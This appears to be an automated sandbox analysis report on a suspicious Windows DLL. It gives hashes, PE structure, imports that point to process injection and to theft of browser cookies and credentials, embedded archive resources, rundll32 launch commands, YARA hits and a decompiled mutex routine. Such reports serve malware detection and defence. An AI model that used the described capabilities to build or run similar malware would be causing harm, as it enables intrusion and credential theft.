                                                Preview: MDMP....... .......K..`...................U...........B......D ......GenuineIntelW...........T...........I..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C88.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8268
                                                Entropy (8bit):3.6953250354060008
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiMg6B6YAU6A2AgmfTZSBCprRx89bYQsf+Im:RrlsNir6B6Yj6A2AgmfTZSGeYjf4
                                                MD5:E3D77CF53ECF7ADB317D3A435DCD8159
                                                SHA1:D28D76FE62068ACB5D8F00D79923955617DB9998
                                                SHA-256:65DF5D85CE9B5BCABAD28554C8A00324EA2271DC2FD9464ADC2058E1D726619F
                                                SHA-512:5A297AC88ED72FFC3493E4072759293A4B52302719ECEE00A6B78070D63F7C4CC595C13ABE25E9F96149ACA7F3CC1593AF54248A772EED1DDC2C019AE2FF0693
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.9.6.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DF0.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.472021705479319
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8BK8fm8M4JCdsfFD3+q8/o64SrSOd:uITfVdxSNNJr3KDWOd
                                                MD5:11E5F02DEF35759B3C71A7D954F0F740
                                                SHA1:BAE0F45B66F1045B6D690D071B391A1BC3D68F70
                                                SHA-256:D7AAABAB2E17E78EC0F35AC3A9E23CBBBA452F34E44C07E5A0F0F03B8CDAF03E
                                                SHA-512:9E84C713910BE1D55E4D061C54D97C8CDA5075C231D0126A02D356BE37CD59949DC10C55A9D8DE80761CCB8760E969CD182417B3B07D5165034963718434AA4A
                                                Malicious:false
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CB4.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:12 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):50486
                                                Entropy (8bit):2.1510325720772263
                                                Encrypted:false
                                                SSDEEP:192:4i5J9Tm4BswRJDrI/QtC0cyflT5wkMQGd2K/WjZvB4Zp6w+jtgief6nLd:PJ9TmHwRJHQ3gO27VvqrF+jtASLd
                                                MD5:8408AA93B0C2C7F26D17D6D77B2C9832
                                                SHA1:63DA04E109DD39C3848A024E5E6BA1A3531F4D4B
                                                SHA-256:C99BD6708DD3A2B4C06BB07717D57723437098322F361CF951A41258210E99E7
                                                SHA-512:980E2D62707C2278EAF476907E7F7DA4801CC6D6FAA1F37A2C1D8A0238B0A6A80875C516B34B6054326BDD7859988AAF1B24E4DA64BE25AAB598A29BEBA89C01
                                                Malicious:false
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA9.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8248
                                                Entropy (8bit):3.693363910446504
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNilM86F6YAg6ApgmfTuSBCpr989bDlsfMBm:RrlsNiF6F6YP6ApgmfTuSLD+fH
                                                MD5:A6CB8208BC27FA8FBA080B2E4D8BDD71
                                                SHA1:6215C7F1D310652F0A034ABAFF81E47DDC288508
                                                SHA-256:B762FAE10CCC9B0C448F8C9AED1AD334E847C464595377410972690F4AB6AEA1
                                                SHA-512:669B97305AC45D8D85B1A173C4ACE63AC58042570F0C7BCCC2850D6BA7D075D6989069896ACFA94071515F3F1B070AB4D20AE98263834F2387F2E79639615609
                                                Malicious:false
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F65.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.4740213509877185
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8Bq28fm8M4JCdsUFoi+q8/oqq4SrSBd:uITfVdxSNMJoaqDWBd
                                                MD5:33574F790F04EE4F15C8FD5D7F13B70F
                                                SHA1:D52A243595682BD5C96A40824A2D9B1475A8411D
                                                SHA-256:88413B191DD655B8B29D8FE0A469109C8867D9E8E97766F7B2D8F146067F7D95
                                                SHA-512:4E9040A48134C860CFE35DD67EE6FBFF8DF44B86ABC739B384CFD1F266A5D532B82B7E8F8B63CBF3502C0080B025F0E3FEECA9C01E139CA75F1542A504C2E325
                                                Malicious:false

                                                Static File Info

                                                General

                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.4522280470694
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:A8xYhQFvXo.dll
                                                File size:4890624
                                                MD5:83dd317c95f4acb8623d1f024945cfdb
                                                SHA1:04f9227cc3bfde5626be669be106a5d38f4416b1
                                                SHA256:5b2f060f1512100a0d500312fa579cdad9d3ea101778838173aa7215cd39700a
                                                SHA512:93cddc6bb6957e38d2485bea380d19b8291d3069d78e03cff58a792a5d6c5a56b983b34f166379a0ff9d1e009a461f71c21a59e98de8081503d9364ad91deb41
                                                SSDEEP:98304:jEn4O4Kkolx67k+Yj6i7SVSVSRDEdxA0L6EwSls/9kXUVje32C:jE4O4KW4rj6ESVSVSR/i6Ewb98d2C

                                                File Icon

                                                Icon Hash:74f0e4ecccdce0e4

                                                Static PE Info

                                                General

                                                Entrypoint:0x100288f0
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x10000000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                DLL Characteristics:
                                                Time Stamp:0x5F9F5377 [Mon Nov 2 00:31:51 2020 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:7438c2384f3e113e7ab9f88b1b5e5108

                                                Entrypoint Preview

                                                Instruction
                                                cmp dword ptr [esp+08h], 01h
                                                jne 00007EFCF482E9C7h
                                                call 00007EFCF483A812h
                                                push dword ptr [esp+04h]
                                                mov ecx, dword ptr [esp+10h]
                                                mov edx, dword ptr [esp+0Ch]
                                                call 00007EFCF482E8B2h
                                                pop ecx
                                                retn 000Ch
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 20h
                                                mov eax, dword ptr [ebp+08h]
                                                push esi
                                                push edi
                                                push 00000008h
                                                pop ecx
                                                mov esi, 10171808h
                                                lea edi, dword ptr [ebp-20h]
                                                rep movsd
                                                mov dword ptr [ebp-08h], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                test eax, eax
                                                pop edi
                                                mov dword ptr [ebp-04h], eax
                                                pop esi
                                                je 00007EFCF482E9CEh
                                                test byte ptr [eax], 00000008h
                                                je 00007EFCF482E9C9h
                                                mov dword ptr [ebp-0Ch], 01994000h
                                                lea eax, dword ptr [ebp-0Ch]
                                                push eax
                                                push dword ptr [ebp-10h]
                                                push dword ptr [ebp-1Ch]
                                                push dword ptr [ebp-20h]
                                                call dword ptr [10171320h]
                                                leave
                                                retn 0008h
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ebx
                                                mov eax, dword ptr [ebp+0Ch]
                                                add eax, 0Ch
                                                mov dword ptr [ebp-04h], eax
                                                mov ebx, dword ptr fs:[00000000h]
                                                mov eax, dword ptr [ebx]
                                                mov dword ptr fs:[00000000h], eax
                                                mov eax, dword ptr [ebp+08h]
                                                mov ebx, dword ptr [ebp+0Ch]
                                                mov ebp, dword ptr [ebp-04h]
                                                mov esp, dword ptr [ebx-04h]
                                                jmp eax
                                                pop ebx
                                                leave
                                                retn 0008h
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ecx
                                                push ebx
                                                push esi
                                                push edi
                                                mov esi, dword ptr fs:[00000000h]
                                                mov dword ptr [ebp-04h], esi
                                                mov dword ptr [ebp-08h], 100289BBh
                                                push 00000000h
                                                push dword ptr [ebp+0Ch]
                                                push dword ptr [ebp-08h]
                                                push dword ptr [ebp+08h]
                                                call 00007EFCF482E9E2h

                                                Rich Headers

                                                Programming Language:
                                                • [RES] VS2005 build 50727
                                                • [ C ] VS2005 build 50727
                                                • [EXP] VS2005 build 50727
                                                • [C++] VS2005 build 50727
                                                • [ASM] VS2005 build 50727
                                                • [LNK] VS2005 build 50727

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x288570         0x6e          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x286c3c         0x118         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x409000         0x98db0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x4a2000         0xb370        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x27b658         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x171000         0x4dc         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x16ff8b      0x170000  False     0.486878104832   data       6.46262078477  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x171000         0x1175de      0x118000  False     0.4536996024     data       6.46893668097  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x289000         0x17f0e4      0x179000  False     0.952282488188   data       7.96722658693  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x409000         0x98db0       0x99000   False     0.999259599673   data       7.99961057955  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x4a2000         0xea20        0xf000    False     0.511735026042   data       5.63038298318  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA       Size     Type                                    Language  Country
CRX          0x409150  0x9369   7-zip archive data, version 0.3         English   United States
FF           0x4124bc  0x87050  7-zip archive data, version 0.3         English   United States
FRIENDS      0x49950c  0x884a   7-zip archive data, version 0.3         English   United States
RT_MANIFEST  0x4a1d58  0x56     ASCII text, with CRLF line terminators  English   United States

Imports

KERNEL32.dll: SetFilePointer, MapViewOfFile, UnmapViewOfFile, SetEndOfFile, HeapAlloc, QueryPerformanceCounter, HeapFree, WaitForSingleObject, InterlockedCompareExchange, UnlockFile, FlushViewOfFile, LockFile, WaitForSingleObjectEx, OutputDebugStringW, GetTickCount, UnlockFileEx, GetProcessHeap, GetSystemTimeAsFileTime, FormatMessageA, InitializeCriticalSection, LoadLibraryW, FormatMessageW, HeapDestroy, LeaveCriticalSection, GetFileAttributesA, HeapCreate, HeapValidate, GetFileAttributesW, FlushFileBuffers, GetTempPathW, HeapSize, LockFileEx, EnterCriticalSection, GetDiskFreeSpaceW, CreateFileMappingA, CreateFileMappingW, GetDiskFreeSpaceA, GetSystemInfo, GetFileAttributesExW, DeleteCriticalSection, GetCurrentThreadId, GetVersionExA, DeleteFileW, HeapCompact, GetTempPathA, AreFileApisANSI, WinExec, GetPrivateProfileStringA, CreateSemaphoreA, VirtualFree, VirtualAlloc, GetLocalTime, OpenFileMappingA, lstrcpynA, CopyFileA, SetFileAttributesA, FindResourceA, LoadResource, SizeofResource, MoveFileA, LockResource, GetWindowsDirectoryA, GetThreadContext, SetThreadContext, VirtualAllocEx, GetModuleHandleA, WriteProcessMemory, ResumeThread, GetThreadLocale, GetFileInformationByHandle, GetDriveTypeA, FileTimeToLocalFileTime, FileTimeToSystemTime, CreateMutexW, HeapReAlloc, GetFullPathNameA, GetFullPathNameW, GetModuleHandleW, DeviceIoControl, CreateFileW, GetVersionExW, GetVolumeInformationW, GetSystemDirectoryW, GetComputerNameW, OutputDebugStringA, DeleteFileA, GetSystemTime, LocalFree, CloseHandle, CreateMutexA, FindNextFileA, LocalAlloc, OpenMutexA, LoadLibraryA, FindClose, GetProcAddress, GetLastError, FindFirstFileA, MultiByteToWideChar, GetTimeZoneInformation, ReadFile, CreateProcessA, WideCharToMultiByte, WriteFile, CompareFileTime, GetCurrentProcess, SystemTimeToFileTime, FreeLibrary, lstrlenA, GetFileSize, CreateFileA, GetStringTypeExA, GetSystemDirectoryA, ExpandEnvironmentStringsA, WaitForMultipleObjects, PeekNamedPipe, SleepEx, SetCurrentDirectoryA, SetFileTime, SetFileAttributesW, CreateDirectoryW, GetCurrentDirectoryA, SetEnvironmentVariableA, GetCurrentProcessId, Sleep, CompareStringW, CompareStringA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, GetStringTypeW, GetStringTypeA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetConsoleMode, GetConsoleCP, GetStartupInfoA, GetFileType, SetHandleCount, GetModuleFileNameA, GetStdHandle, ExitProcess, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, CreateDirectoryA, ExitThread, CreateThread, GetCommandLineA, RaiseException, RtlUnwind, GetCPInfo, LCMapStringA, LCMapStringW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP
USER32.dll: wsprintfA, LoadStringA, wsprintfW, GetSystemMetrics
ADVAPI32.dll: GetSidIdentifierAuthority, CryptDestroyKey, CryptEncrypt, CryptReleaseContext, CryptImportKey, CryptAcquireContextA, GetSecurityDescriptorSacl, SetSecurityInfo, ControlService, OpenSCManagerA, StartServiceA, CreateServiceA, DeleteService, CloseServiceHandle, OpenServiceA, LookupAccountNameW, GetSidSubAuthorityCount, GetSidSubAuthority, CryptCreateHash, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExA, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegQueryValueExW, LookupAccountSidA, RegQueryValueExA, RegSetValueExA, GetTokenInformation, OpenProcessToken, CryptDestroyHash, CryptGetHashParam, CryptHashData
SHELL32.dll: SHGetPathFromIDListA, SHGetMalloc, SHGetSpecialFolderLocation, SHFileOperationA, SHGetSpecialFolderPathA
ole32.dll: CoInitialize, CoUninitialize, CoCreateInstance
SHLWAPI.dll: PathFindFileNameA, PathRemoveFileSpecA, PathFileExistsA, SHGetValueA
WS2_32.dll: getpeername, closesocket, socket, connect, sendto, recvfrom, accept, listen, inet_addr, gethostbyname, inet_ntoa, getservbyname, gethostbyaddr, getservbyport, ioctlsocket, gethostname, getsockopt, htons, bind, ntohs, setsockopt, WSAIoctl, select, __WSAFDIsSet, WSASetLastError, send, recv, WSAGetLastError, WSAStartup, WSACleanup, htonl, getsockname, ntohl
CRYPT32.dll: CryptUnprotectData
VERSION.dll: GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
WINHTTP.dll: WinHttpAddRequestHeaders, WinHttpQueryOption, WinHttpReceiveResponse, WinHttpSetTimeouts, WinHttpSetOption, WinHttpSendRequest, WinHttpConnect, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpQueryDataAvailable, WinHttpOpen, WinHttpOpenRequest, WinHttpReadData, WinHttpSetCredentials
WININET.dll: InternetGetCookieExA, InternetGetCookieA
SETUPAPI.dll: SetupDiGetDeviceRegistryPropertyA, SetupDiEnumDeviceInfo, SetupDiDestroyDeviceInfoList, SetupDiGetClassDevsA
WLDAP32.dll

Exports

Name      Ordinal  Address
Hello001  1        0x10148400
Hello002  2        0x10148370
Hello003  3        0x10148300

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                Network Behavior

                                                Network Port Distribution

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 30, 2021 14:22:57.140047073 CET  55984        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:22:57.199223042 CET  53           55984      8.8.8.8      192.168.2.3
Jan 30, 2021 14:22:58.107640028 CET  64185        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:22:58.155550957 CET  53           64185      8.8.8.8      192.168.2.3
Jan 30, 2021 14:22:59.079483032 CET  65110        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:22:59.130264997 CET  53           65110      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:00.114022017 CET  58361        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:00.171459913 CET  53           58361      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:01.126566887 CET  63492        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:01.185852051 CET  53           63492      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:02.291366100 CET  60831        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:02.339575052 CET  53           60831      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:03.112068892 CET  60100        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:03.164654016 CET  53           60100      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:04.301146030 CET  53195        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:04.349097967 CET  53           53195      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:05.443454981 CET  50141        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:05.495985985 CET  53           50141      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:06.295280933 CET  53023        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:06.353816032 CET  53           53023      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:06.400911093 CET  49563        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:06.448723078 CET  53           49563      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:09.283931971 CET  51352        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:09.332432985 CET  53           51352      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:10.654191971 CET  59349        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:10.708065033 CET  53           59349      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:11.519303083 CET  57084        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:11.568506002 CET  53           57084      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:12.727240086 CET  58823        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:12.777928114 CET  53           58823      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:13.687099934 CET  57568        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:13.734935999 CET  53           57568      8.8.8.8      192.168.2.3
Jan 30, 2021 14:23:13.957366943 CET  50540        53         192.168.2.3  8.8.8.8
Jan 30, 2021 14:23:14.016382933 CET  53           50540      8.8.8.8      192.168.2.3

                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior


                                                System Behavior

                                                General

                                                Start time:14:23:01
                                                Start date:30/01/2021
                                                Path:C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll'
                                                Imagebase:0x1240000
                                                File size:120832 bytes
                                                MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:14:23:01
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                General

                                                Start time:14:23:03
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:14:23:05
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                General

                                                Start time:14:23:06
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:14:23:08
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                General

                                                Start time:14:23:11
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis


                                                  Executed Functions

                                                  C-Code - Quality: 100%
                                                  			E101456A0(CHAR* _a4) {
                                                  				struct _SECURITY_DESCRIPTOR _v24;
                                                  				int _v28;
                                                  				struct _SECURITY_ATTRIBUTES _v40;
                                                  				int _v44;
                                                  				void* _t19;
                                                  
                                                  				_v44 = 0;
                                                  				_v28 = 0;
                                                  				InitializeSecurityDescriptor( &_v24, 1);
                                                  				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
                                                  				_v40.nLength = 0xc;
                                                  				_v40.bInheritHandle = 1;
                                                  				_v40.lpSecurityDescriptor =  &_v24;
                                                  				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
                                                  				_v28 = _t19;
                                                  				if(_v28 != 0 && GetLastError() == 0xb7) {
                                                  					_v44 = 1;
                                                  				}
                                                  				return _v44;
                                                  			}


                                                  APIs
                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 101456BA
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 101456CA
                                                  • CreateMutexA.KERNELBASE(0000000C,00000000,10148380), ref: 101456EE
                                                  • GetLastError.KERNEL32 ref: 101456FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                  • String ID:
                                                  • API String ID: 4085719312-0
                                                  • Opcode ID: e3e17ce41a06682c993a9f935530270e02ade333748fd219aeb766829328ae75
                                                  • Instruction ID: dd95825a369740b842403e6be7ae1189b9f110d36615d86a031ac87e3b427bdb
                                                  • Opcode Fuzzy Hash: e3e17ce41a06682c993a9f935530270e02ade333748fd219aeb766829328ae75
                                                  • Instruction Fuzzy Hash: 2501FB74940309DFEB00DF94CD89BEDBBB5EB08305F600514EA01BA691D7B95A84CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 82%
                                                  			E1014BE00(void* __edi, void* __eflags, intOrPtr _a4) {
                                                  				char _v267;
                                                  				char _v268;
                                                  				CHAR* _v272;
                                                  				intOrPtr _v276;
